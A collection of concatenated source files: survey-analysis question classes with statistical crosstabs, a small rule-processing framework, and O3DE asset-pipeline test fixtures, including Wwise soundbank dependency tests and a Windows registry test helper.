for the cut variable, the # exclusions for this question are removed in cut_by, if # appropriate if remove_exclusions: values_to_drop = other_question.scale.excluded_choices() for v in values_to_drop: df[other_question.variable].replace(v, np.nan, inplace=True) groups = df.groupby(other_question.label) group_mapping = dict(zip(other_question.scale.values, other_question.scale.choices)) oth_text = cut_var_label if not oth_text: oth_text = other_question.text return(self.cut_by(groups, group_mapping, oth_text, question_label, pct_format, remove_exclusions, show_mean, mean_format)) def cut_by(self, groups, group_label_mapping, cut_var_label, question_label=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): freqs = [] for k, gp in groups: t = (self.frequency_table(gp, True, False, True, pct_format, remove_exclusions, False, show_mean, mean_format)) t.set_index("Answer", inplace=True) series = t.ix[:,0] series.name = group_label_mapping[k] freqs.append(series) df = pd.DataFrame(freqs) if show_mean: if self.compare_groups(groups): df.columns = df.columns.tolist()[:-1] + \ 
[df.columns.tolist()[-1]+"*"] my_label = question_label if not my_label: my_label = self.text # Add hierarchical index to rows top_index = [cut_var_label]*len(groups) df.index = pd.MultiIndex.from_arrays([top_index, df.index.tolist()]) # Add hierarchical index to columns col_top_index = [my_label]*len(self.scale.get_choices(remove_exclusions)) if show_mean: col_top_index += [my_label] df.columns = pd.MultiIndex.from_arrays([col_top_index, df.columns.tolist()]) return(df) def compare_groups(self, groupby, pval = .05): data = [d[self.variable].dropna() for groupname, d in groupby] if len(groupby) == 2: ts, ps = ttest_ind(*data, equal_var=False) return(ps < pval) elif len(groupby.groups.keys()) == 2: # ANOVA f, p = f_oneway(*data) return(p < .05) else: return(False) def freq_table_to_json(self, df): t = self.frequency_table(df, True, True, True, ".9f", True, False, False, ".1f", False) t.columns = ["category", "count", "pct"] return(t.to_json(orient="records")) def graph_type(self): return('horizontal_bar') class SelectMultipleQuestion(SelectQuestion): def __init__(self, text, vars, choices, label, exclude_from_analysis, matrix=None): self.text = text self.label = label self.variables = vars self.matrix = matrix self.scale = QuestionScale.create_scale('nominal', choices, exclude_from_analysis) def get_variable_names(self): return(self.variables) def reverse_choices(self): self.scale.reverse_choices() self.variables.reverse() def pretty_print(self, show_choices=True): print("{} ({})".format(self.text, self.label)) if show_choices: self.pretty_print_choices() def pretty_print_choices(self): l = [] for c, v, x in zip(self.scale.choices, self.variables, self.scale.exclude_from_analysis): if x: l.append("{} (X)".format(c)) else: l.append("{} ({})".format(c, v)) print(", ".join(l)) def tally(self, df, remove_exclusions=True): """ Returns (list, int1, int2) tuple where list is a count of responses for each answer choice. Int1 is the number of respondents, and int2 is the number of nonrespondents. 
""" vars = self.variables if remove_exclusions: vars = list(compress(vars, [not x for x in self.scale.exclude_from_analysis])) unit_record = df[vars] nonrespondents = 0 respondents = 0 cts = [0]*len(vars) for index, row in unit_record.iterrows(): if row.dropna().empty: nonrespondents += 1 else: respondents += 1 ct = 0 for i, v in row.iteritems(): if not np.isnan(v): cts[ct] += 1 ct += 1 return(cts, respondents, nonrespondents) def frequency_table(self, df, show_question=True, ct=True, pct_respondents=True, pct_responses=False, pct_format=".0%", remove_exclusions=True, show_totals=True): cts, resp, nonresp = self.tally(df, remove_exclusions) data = [] cols = [] tots = [] if show_question: data.append(self.scale.get_choices(remove_exclusions)) cols.append("Answer") tots.append("Total respondents") if ct: data.append(cts) cols.append("Count") tots.append(resp) if pct_respondents: data.append([format(x/resp, pct_format) for x in cts]) cols.append("% of respondents") tots.append("") if pct_responses: data.append([format(x/sum(cts), pct_format) for x in cts]) cols.append("% of responses") tots.append("") tbl = pd.DataFrame(data).T tbl.columns = cols if show_totals: tbl.loc[len(tbl)] = tots return(tbl) def cut_by_question(self, other_question, response_set, cut_var_label=None, question_label=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): if type(other_question) != SelectOneQuestion: raise(Exception("Can only call cut_by_question on a SelectOneQuestion type")) df = response_set.copy() # Here we remove the exclusions for the cut variable, the # exclusions for this question are removed in cut_by, if # appropriate if remove_exclusions: values_to_drop = [v for v, e in zip(other_question.values, other_question.scale.exclude_from_analysis) if e] for v in values_to_drop: df[other_question.variable].replace(v, np.nan, inplace=True) groups = df.groupby(other_question.label) group_mapping = dict(zip(other_question.scale.values, other_question.scale.choices)) oth_text = cut_var_label if not oth_text: oth_text = other_question.text return(self.cut_by(groups, group_mapping, oth_text, question_label, pct_format, remove_exclusions)) def cut_by(self, groups, group_label_mapping, cut_var_label, question_label=None, pct_format=".0%", remove_exclusions=True): freqs = [] for k, gp in groups: t = (self.frequency_table(gp, True, False, True, False, pct_format, remove_exclusions, False)) t.set_index("Answer", inplace=True) series = t.ix[:,0] series.name = group_label_mapping[k] freqs.append(series) df = pd.DataFrame(freqs) my_label = question_label if not my_label: my_label = self.text # Add significance flags sigs = self.compare_groups(groups, remove_exclusions) newcols = [] for s, i in zip(sigs, df.columns.tolist()): if s: newcols.append(i + "*") else: newcols.append(i) # Add hierarchical index to rows top_index = [cut_var_label]*len(groups) df.index = pd.MultiIndex.from_arrays([top_index, df.index.tolist()]) # Add hierarchical index to columns col_top_index = [my_label]*len(self.choices) df.columns = pd.MultiIndex.from_arrays([col_top_index, newcols]) return(df) def compare_groups(self, groupby, remove_exclusions=True, pval = .05): groupnames = groupby.groups.keys() obs_by_cut = [] ct_by_cut = [] for k, df in groupby: freqs, tot_resp, tot_nonresp = self.tally(df, remove_exclusions) obs_by_cut.append(freqs) ct_by_cut.append(tot_resp) choice_totals = [sum(x) for x in zip(*obs_by_cut)] exp_prop_per_choice = [t/sum(ct_by_cut) for t in choice_totals] sigs = [] for f_obs, choice_tot, 
p_choice in zip(zip(*obs_by_cut), choice_totals, exp_prop_per_choice): f_exp = [p_choice * ct for ct in ct_by_cut] chisq, p = chisquare(f_obs, f_exp) sigs.append(p < pval) return(sigs) def freq_table_to_json(self, df): t = self.frequency_table(df, True, True, True, False, ".9f", True, False) t.columns = ["category", "count", "pct"] return(t.to_json(orient="records")) def graph_type(self): return('horizontal_bar') ```
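An assumed usage sketch for `SelectOneQuestion` follows; the column name, labels, and answer values are made up, and the scale behaviour depends on `surveyhelper.scale`, which is not shown here.
```python
# Assumed usage sketch: build a select-one question by hand and tabulate a few
# responses from a small DataFrame.
import pandas as pd
from surveyhelper.question import SelectOneQuestion

q = SelectOneQuestion(
    text="How satisfied are you?",
    var="q1",
    choices=["Low", "Medium", "High"],
    label="q1",
    values=[1, 2, 3],
    exclude_from_analysis=[False, False, False],
)

df = pd.DataFrame({"q1": [1, 2, 2, 3, 3, 3]})
print(q.frequency_table(df))  # counts, percentages, total and mean per choice
print(q.mean(df))             # mean of the answer values weighted by counts
```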
{ "source": "aaaron7/LGPC", "score": 3 }
#### File: LGPC/parser/rule.py
```python
import sys
import json
import os
from os import listdir
from os.path import isfile, join
import requests
import time
import random
import urllib

from LGPC.utils import packet, status


class RuleContext:
    def __init__(self) -> None:
        self.streams = {}

    def add_packet(self, packet, stream_name) -> None:
        if stream_name not in self.streams:
            self.streams[stream_name] = []
        self.streams[stream_name].append(packet)

    def pop_packet(self, stream_name) -> None:
        self.streams[stream_name].pop()

    def get_input(self, index: int) -> packet.Packet:
        pass

    def write_output(self, index: int, packet: packet.Packet) -> status.Status:
        pass


class RuleConfig:
    def __init__(self, name, input_names, output_names) -> None:
        self.name = name
        self.input_names = input_names
        self.output_names = output_names


class Rule:
    """
    All rules use the immediate input policy by default: process will be
    called whenever any of the inputs is ready.
    """

    def __init__(self):
        pass

    def prepare(self, context: RuleContext, config: RuleConfig) -> status.Status:
        pass

    def process(self, context: RuleContext, config: RuleConfig) -> status.Status:
        pass

    def close(self, context: RuleContext, config: RuleConfig) -> status.Status:
        pass


if __name__ == "__main__":
    pass
```
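A minimal pass-through rule built on the classes above; this is an assumed usage sketch, and the import path is only inferred from the file location.
```python
# Assumed usage sketch: a rule that copies packets from its first input stream
# to its first output stream.
from LGPC.parser.rule import Rule, RuleContext, RuleConfig  # path inferred from the file layout


class PassThroughRule(Rule):
    def process(self, context, config):
        for pkt in context.streams.get(config.input_names[0], []):
            context.add_packet(pkt, config.output_names[0])


config = RuleConfig("passthrough", input_names=["in0"], output_names=["out0"])
context = RuleContext()
context.add_packet({"payload": 1}, "in0")
PassThroughRule().process(context, config)
print(context.streams["out0"])  # [{'payload': 1}]
```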
{ "source": "aaarsene/o3de", "score": 2 }
#### File: assetpipeline/ap_fixtures/ap_config_default_platform_fixture.py ```python import pytest from . import asset_processor_fixture as asset_processor from . import ap_config_backup_fixture as ap_config_backup_fixture @pytest.fixture def ap_config_default_platform_fixture(request, workspace, asset_processor, ap_config_backup_fixture) -> None: asset_processor.disable_all_asset_processor_platforms() ``` #### File: assetpipeline/ap_fixtures/ap_idle_fixture.py ```python import pytest import os import time # Import fixtures from . import ap_setup_fixture # Import LyTestTools import ly_test_tools.environment.waiter as waiter from ly_test_tools.o3de.ap_log_parser import APLogParser @pytest.mark.usefixtures("test_assets") class TimestampChecker(object): def __init__(self, file_path, timeout) -> None: self.file = file_path self.timeout = timeout self.original_mod_time = int(round(time.time() * 1000)) self.start_time = time.time() self.log = None def set_file_path(self, file_path): self.file = file_path def grab_current_timestamp(self) -> None: self.original_mod_time = int(round(time.time() * 1000)) def check_if_idle(self, timeout=None, starttime=None, updatetime_max=30) -> None: if timeout is None: timeout = self.timeout if starttime: time.sleep(starttime) def log_reports_idle() -> bool: """ Grabs the current log run and reads it line by line from the bottom up Returns whether the idle message appears later in the log than the latest "Processing [...]" message """ if updatetime_max and os.path.exists(self.file): last_file_update = os.path.getmtime(self.file) timedelta = time.time() - last_file_update if timedelta > updatetime_max: # Has the file exceeded the limit # Additionally we want to make sure the test has exceeded the limit so we don't catch # a log from a previous run where our current test hasn't engaged any action from AP if time.time() - self.start_time > updatetime_max: return True self.log = APLogParser(self.file) line_index = len(self.log.runs[-1]["Lines"]) - 1 while line_index > 0: line = self.log.runs[-1]["Lines"][line_index] timestamp = self.log.runs[-1]["Timestamps"][line_index] if self.log.get_line_type(line) == "AssetProcessor": message = self.log.remove_line_type(line) if timestamp <= self.original_mod_time: return False elif message.startswith("Processing"): return False elif "Job processing completed. Asset Processor is currently idle." in message: self.original_mod_time = timestamp return True line_index -= 1 waiter.wait_for(lambda: (log_reports_idle()), timeout=timeout or self.timeout) @pytest.fixture def ap_idle_fixture(request, workspace, timeout: int) -> TimestampChecker: """ Allows checking the GUI for idle by grabbing the initial modified time of the log file and looking for new "idle" messages later """ return TimestampChecker(workspace.paths.ap_gui_log(), timeout, workspace) ``` #### File: assetpipeline/wwise_bank_dependency_tests/bank_info_parser_tests.py ```python import os import pytest import sys soundbanks_xml_filename = 'SoundbanksInfo.xml' @pytest.fixture def soundbank_metadata_generator_setup_fixture(workspace): resources = dict() resources['tests_dir'] = os.path.dirname(os.path.realpath(__file__)) return resources def success_case_test(test_folder, expected_dependencies_dict, bank_info, expected_result_code=0): """ Test Steps: 1. Make sure the return code is what was expected, and that the expected number of banks were returned. 2. Validate bank is in the expected dependencies dictionary. 3. 
Validate the path to output the metadata file to was assembled correctly. 4. Validate metadata object for this bank is set, and that it has an object assigned to its dependencies field and its includedEvents field 5. Validate metadata object has the correct number of dependencies, and validated that every expected dependency exists in the dependencies list of the metadata object. 6. Validate metadata object has the correct number of events, and validate that every expected event exists in the events of the metadata object. """ expected_bank_count = len(expected_dependencies_dict) banks, result_code = bank_info.generate_metadata( os.path.join(test_folder, soundbanks_xml_filename), test_folder) # Make sure the return code is what was expected, and that the expected number of banks were returned. assert result_code is expected_result_code assert len(banks) is expected_bank_count for bank_index in range(expected_bank_count): bank = banks[bank_index] # Find a bank of this name in the expected dependencies dictionary. assert bank.path in expected_dependencies_dict # Make sure the path to output the metadata file to was assembled correctly. expected_metadata_filepath = os.path.splitext(os.path.join(test_folder, bank.path))[0] + \ bank_info.metadata_file_extension assert bank.metadata_path == expected_metadata_filepath # Make sure the metadata object for this bank is set, and that it has an object assigned to # its dependencies field and its includedEvents field assert bank.metadata_object assert bank.metadata_object['dependencies'] is not None assert bank.metadata_object['includedEvents'] is not None # Make sure the generated metadata object has the correct number of dependencies, and validated that every # expected dependency exists in the dependencies list of the metadata object. assert len(bank.metadata_object['dependencies']) is len(expected_dependencies_dict[bank.path]['dependencies']) for dependency in expected_dependencies_dict[bank.path]['dependencies']: assert dependency in bank.metadata_object['dependencies'] # Make sure the generated metadata object has the correct number of events, and validate that every expected # event exists in the events list of the metadata object. assert len(bank.metadata_object['includedEvents']) is len(expected_dependencies_dict[bank.path]['events']) for event in expected_dependencies_dict[bank.path]['events']: assert event in bank.metadata_object['includedEvents'] def get_bank_info(workspace): sys.path.append( os.path.join(workspace.paths.engine_root(), 'Gems', 'AudioEngineWwise', 'Tools')) from WwiseAuthoringScripts import bank_info_parser as bank_info_module return bank_info_module @pytest.mark.usefixtures("workspace") @pytest.mark.SUITE_periodic @pytest.mark.parametrize("project", ["AutomatedTesting"]) class TestSoundBankMetadataGenerator: def test_NoMetadataTooFewBanks_ReturnCodeIsError(self, workspace, soundbank_metadata_generator_setup_fixture): """ Trying to generate metadata for banks in a folder with one or fewer banks and no metadata is not possible and should fail. Test Steps: 1. Setup testing environment with only 1 bank file 2. Get Sound Bank Info 3. Attempt to generate sound bank metadata 4. 
Verify that proper error code is returned """ # test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataTooFewBanks_ReturnCodeIsError') if not os.path.isdir(test_assets_folder): os.makedirs(test_assets_folder) bank_info = get_bank_info(workspace) banks, error_code = bank_info.generate_metadata( os.path.join(test_assets_folder, soundbanks_xml_filename), test_assets_folder) os.rmdir(test_assets_folder) assert error_code is 2, 'Metadata was generated when there were fewer than two banks in the target directory.' def test_NoMetadataNoContentBank_NoMetadataGenerated(self, workspace, soundbank_metadata_generator_setup_fixture): """ Test Steps: 1. Setup testing environment 2. No expected dependencies 3. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataNoContentBank_NoMetadataGenerated') expected_dependencies = dict() success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_NoMetadataOneContentBank_NoStreamedFiles_OneDependency(self, workspace, soundbank_metadata_generator_setup_fixture): """ When no Wwise metadata is present, and there is only one content bank in the target directory with no wem files, then only the content bank should have metadata associated with it. The generated metadata should only describe a dependency on the init bank. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataOneContentBank_NoStreamedFiles_OneDependency') bank_info = get_bank_info(workspace) expected_dependencies = {'Content.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []},} success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_NoMetadataOneContentBank_StreamedFiles_MultipleDependencies(self, workspace, soundbank_metadata_generator_setup_fixture): """ When no Wwise metadata is present, and there is only one content bank in the target directory with wem files present, then only the content bank should have metadata associated with it. The generated metadata should describe a dependency on the init bank and all wem files in the folder. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataOneContentBank_StreamedFiles_MultipleDependencies') bank_info = get_bank_info(workspace) expected_dependencies = { 'Content.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem', '791740036.wem' ], 'events': [] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_NoMetadataMultipleBanks_OneDependency_ReturnCodeIsWarning(self, workspace, soundbank_metadata_generator_setup_fixture): """ When no Wwise metadata is present, and there are multiple content banks in the target directory with wem files present, there is no way to tell which bank requires which wem files. A warning should be emitted, stating that the full dependency graph could not be created, and only dependencies on the init bank are described in the generated metadata files. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. 
Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_NoMetadataMultipleBanks_OneDependency_ReturnCodeIsWarning') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []}, 'test_bank2.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []} } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace), expected_result_code=1) def test_OneContentBank_NoStreamedFiles_OneDependency(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes one content bank that contains all media needed by its events. Generated metadata describes a dependency only on the init bank. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_OneContentBank_NoStreamedFiles_OneDependency') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_1_bank1_embedded_target'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_OneContentBank_StreamedFiles_MultipleDependencies(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes one content bank that references streamed media files needed by its events. Generated metadata describes dependencies on the init bank and wems named by the IDs of referenced streamed media. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_OneContentBank_StreamedFiles_MultipleDependencies') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem', '791740036.wem' ], 'events': [ 'test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target' ] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_NoStreamedFiles_OneDependency(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Each bank contains all media needed by its events. Generated metadata describes each bank having a dependency only on the init bank. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_NoStreamedFiles_OneDependency') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_1_bank1_embedded_target'] }, 'test_bank2.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_3_bank2_embedded_target', 'test_event_4_bank2_streamed_target'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_Bank1StreamedFiles(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. 
Bank 1 references streamed media files needed by its events, while bank 2 contains all media need by its events. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_Bank1StreamedFiles') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target'] }, 'test_bank2.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_3_bank2_embedded_target', 'test_event_4_bank2_streamed_target'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_SplitBanks_OnlyBankDependenices(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 3 events require media that is contained in bank 4. Generated metadata describes each bank having a dependency on the init bank, while bank 3 has an additional dependency on bank 4. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_SplitBanks_OnlyBankDependenices') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank3.bnk': { 'dependencies': [ bank_info.init_bank_path, 'test_bank4.bnk' ], 'events': ['test_event_5_bank3_embedded_target_bank4'] }, 'test_bank4.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []} } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_ReferencedEvent_MediaEmbeddedInBank(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 1 contains all media required by its events, while bank 5 contains a reference to an event in bank 1, but no media for that event. Generated metadata describes both banks having a dependency on the init bank, while bank 5 has an additional dependency on bank 1. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_ReferencedEvent_MediaEmbeddedInBank') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_1_bank1_embedded_target'] }, 'test_bank5.bnk': { 'dependencies': [ bank_info.init_bank_path, 'test_bank1.bnk' ], 'events': ['test_event_1_bank1_embedded_target', 'test_event_7_bank5_referenced_event_bank1_embedded'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_ReferencedEvent_MediaStreamed(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 1 references streamed media files needed by its events, while bank 5 contains a reference to an event in bank 1. This causes bank 5 to also describe a reference to the streamed media file referenced by the event from bank 1. 
Generated metadata describes both banks having dependencies on the init bank, as well as the wem named by the ID of referenced streamed media. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_ReferencedEvent_MediaStreamed') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_2_bank1_streamed_target'] }, 'test_bank5.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_2_bank1_streamed_target', 'test_event_8_bank5_referenced_event_bank1_streamed'] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_ReferencedEvent_MixedSources(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks. Bank 1 references a streamed media files needed by one of its events, and contains all media needed for its other events, while bank 5 contains a reference to two events in bank 1: one that requires streamed media, and one that requires media embedded in bank 1. Generated metadata describes both banks having dependencies on the init bank and the wem named by the ID of referenced streamed media, while bank 5 has an additional dependency on bank 1. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_ReferencedEvent_MixedSources') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target'] }, 'test_bank5.bnk': { 'dependencies': [ bank_info.init_bank_path, 'test_bank1.bnk', '590205561.wem' ], 'events': [ 'test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target', 'test_event_7_bank5_referenced_event_bank1_embedded', 'test_event_8_bank5_referenced_event_bank1_streamed' ] } } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) def test_MultipleContentBanks_VaryingDependencies_MixedSources(self, workspace, soundbank_metadata_generator_setup_fixture): """ Wwise metadata describes multiple content banks that have varying dependencies on each other, and dependencies on streamed media files. Test Steps: 1. Setup testing environment 2. Get current bank info 3. Build expected dependencies 4. 
Call success case test """ test_assets_folder = os.path.join(soundbank_metadata_generator_setup_fixture['tests_dir'], 'assets', 'test_MultipleContentBanks_VaryingDependencies_MixedSources') bank_info = get_bank_info(workspace) expected_dependencies = { 'test_bank1.bnk': { 'dependencies': [ bank_info.init_bank_path, '590205561.wem' ], 'events': ['test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target'] }, 'test_bank2.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': ['test_event_3_bank2_embedded_target', 'test_event_4_bank2_streamed_target'] }, 'test_bank3.bnk': { 'dependencies': [ bank_info.init_bank_path, '791740036.wem', 'test_bank4.bnk' ], 'events': ['test_event_5_bank3_embedded_target_bank4', 'test_event_6_bank3_streamed_target_bank4'] }, 'test_bank4.bnk': {'dependencies': [bank_info.init_bank_path], 'events': []}, 'test_bank5.bnk': { 'dependencies': [ bank_info.init_bank_path, 'test_bank1.bnk', '590205561.wem' ], 'events': [ 'test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target', 'test_event_7_bank5_referenced_event_bank1_embedded', 'test_event_8_bank5_referenced_event_bank1_streamed' ] }, 'test_bank6.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': [ 'test_event_3_bank2_embedded_target', 'test_event_4_bank2_streamed_target', 'test_event_9_bank6_referenced_event_bank2_embedded', 'test_event_10_bank6_referenced_event_bank2_streamed' ] }, } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) ``` #### File: PythonTests/automatedtesting_shared/windows_registry_setting.py ```python import pytest import logging from typing import List, Optional, Tuple, Any from winreg import ( CreateKey, OpenKey, QueryValueEx, DeleteValue, SetValueEx, KEY_ALL_ACCESS, KEY_WRITE, REG_SZ, REG_MULTI_SZ, REG_DWORD, HKEY_CURRENT_USER, ) from .platform_setting import PlatformSetting logger = logging.getLogger(__name__) class WindowsRegistrySetting(PlatformSetting): def __init__(self, workspace: pytest.fixture, subkey: str, key: str, hive: Optional[str] = None) -> None: super().__init__(workspace, subkey, key) self._hive = None try: if hive is not None: self._hive = self._str_to_hive(hive) except ValueError: logger.warning(f"Windows Registry Hive {hive} not recognized, using default: HKEY_CURRENT_USER") finally: if self._hive is None: self._hive = HKEY_CURRENT_USER def get_value(self, get_type: Optional[bool] = False) -> Any: """Retrieves the fast scan value in Windows registry (and optionally the type). 
If entry DNE, returns None.""" if self.entry_exists(): registryKey = OpenKey(self._hive, self._key) value = QueryValueEx(registryKey, self._subkey) registryKey.Close() # Convert windows data type to universal data type flag: PlatformSettings.DATA_TYPE # And handles unicode conversion for strings value = self._convert_value(value) return value if get_type else value[0] else: logger.warning(f"Could not retrieve Registry entry; key: {self._key}, subkey: {self._subkey}.") return None def set_value(self, value: Any) -> bool: """Sets the Windows registry value.""" value, win_type = self._format_data(value) registryKey = None result = False try: CreateKey(self._hive, self._subkey) registryKey = OpenKey(self._hive, self._key, 0, KEY_WRITE) SetValueEx(registryKey, self._subkey, 0, win_type, value) result = True except WindowsError as e: logger.warning(f"Windows error caught while setting fast scan registry: {e}") finally: if registryKey is not None: # Close key if it's been opened successfully registryKey.Close() return result def delete_entry(self) -> bool: """Deletes the Windows registry entry for fast scan enabled""" try: if self.entry_exists(): registryKey = OpenKey(self._hive, self._key, 0, KEY_ALL_ACCESS) DeleteValue(registryKey, self._subkey) registryKey.Close() return True except WindowsError: logger.error(f"Could not delete registry entry; key: {self._key}, subkey: {self._subkey}") finally: return False def entry_exists(self) -> bool: """Checks for existence of the setting in Windows registry.""" try: # Attempt to open and query key. If fails then the entry DNE registryKey = OpenKey(self._hive, self._key) QueryValueEx(registryKey, self._subkey) registryKey.Close() return True except WindowsError: return False @staticmethod def _format_data(value: bool or int or str or List[str]) -> Tuple[int or str or List[str], int]: """Formats the type of the value provided. Returns the formatted value and the windows registry type (int).""" if type(value) == str: return value, REG_SZ elif type(value) == bool: value = "true" if value else "false" return value, REG_SZ elif type(value) == int or type(value) == float: if type(value) == float: logger.warning(f"Windows registry does not support floats. 
Truncating {value} to integer") value = int(value) return value, REG_DWORD elif type(value) == list: for single_value in value: if type(single_value) != str: # fmt:off raise ValueError( f"Windows Registry lists only support strings, got a {type(single_value)} in the list") # fmt:on return value, REG_MULTI_SZ else: raise ValueError(f"Windows registry expected types: int, str and [str], found {type(value)}") @staticmethod def _convert_value(value_tuple: Tuple[Any, int]) -> Tuple[Any, PlatformSetting.DATA_TYPE]: """Converts the Windows registry data and type (tuple) to a (standardized) data and PlatformSetting.DATA_TYPE""" value, windows_type = value_tuple if windows_type == REG_SZ: # Convert from unicode to string return value, PlatformSetting.DATA_TYPE.STR elif windows_type == REG_MULTI_SZ: # Convert from unicode to string return [string for string in value], PlatformSetting.DATA_TYPE.STR_LIST elif windows_type == REG_DWORD: return value, PlatformSetting.DATA_TYPE.INT else: raise ValueError(f"Type flag not recognized: {windows_type}") @staticmethod def _str_to_hive(hive_str: str) -> int: """Converts a string to a Windows Registry Hive enum (int)""" from winreg import HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_LOCAL_MACHINE, HKEY_USERS lower = hive_str.lower() if lower == "hkey_current_user" or lower == "current_user": return HKEY_CURRENT_USER elif lower == "hkey_classes_root" or lower == "classes_root": return HKEY_CLASSES_ROOT elif lower == "hkey_current_config" or lower == "current_config": return HKEY_CURRENT_CONFIG elif lower == "hkey_local_machine" or lower == "local_machine": return HKEY_LOCAL_MACHINE elif lower == "hkey_users" or lower == "users": return HKEY_USERS else: raise ValueError(f"Hive: {hive_str} not recognized") ``` #### File: editor/EditorScripts/Menus_FileMenuOptions.py ```python import os import sys import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) from editor_python_test_tools.editor_test_helper import EditorTestHelper import 